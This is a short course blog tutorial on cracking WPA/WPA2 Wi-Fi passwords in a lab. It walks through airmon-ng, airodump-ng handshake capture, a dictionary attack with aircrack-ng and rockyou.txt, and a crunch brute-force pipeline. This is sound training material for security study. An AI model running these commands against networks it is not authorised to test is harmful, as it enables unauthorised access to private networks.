Wifi cracking WPA/WPA2

This blog is written as part of the Master cybersecurity course from HackerU. In the modern world, Cyber attacks have increased as more of our daily activity, business activities and others are done over internet. Wifi hacking is also one of the common entry point for the the attackers. In this blog we will go through how to bypass the wifi/router.

WEP, WPA, WPA2 & WPA3 Cheat sheet

1. Lab setup for the attack

→ Kali machine as an attacker

→wifi adapter which supports monitor mode.

→ Target wifi router.

2. Setting wifi adapter to monitor mode.

Connect the wifi adapter to the attacker machine kali.

Then check weather interface is set to monitor mode from manual, run the below command.

iwconfig

if it is not set to monitor mode then run the below command to set it to the monitor mode.

airmon-ng start wlan0

3. Capturing the handshake.

After setting to monitor mode now we need to know all the networks in the range. Run the below command.

airodump-ng wlan0mon

As per the captured networks, we should choose our prefered or targeted network and capture the packets and handshake.

airodump-ng -c 11 — bssid 2A:7B:A3:1E:4C:CB -w wpa2handshake2.cap wlan0mon

• -c : channel of router
• — bssid : bssid of router/MAC
• -w : captured output file

4. Cracking the password.

Now use the below command to perform brute fore attack with the known dictniory rockyou.txt (Note : This rockyou.txt contains known set of passwords which is made use to crack the password)

aircrack-ng wpa2handshake2-01.cap -w /usr/share/wordlists/rockyou.txt

Were successful in cracking the password and our password is 12345670.

Note : If suppose password was not present in rockyou.txt then we would not be able to crack the password. In this case we should generate the password file using crunch.

Example: crunch 10 10 0123456789 -t 876%%%%%%% | aircrack-ng wpa_challenge-01.cap -w- -b C4:E9:0A:DD:CC:50

Below chart shows how long will it take for the password too be cracked.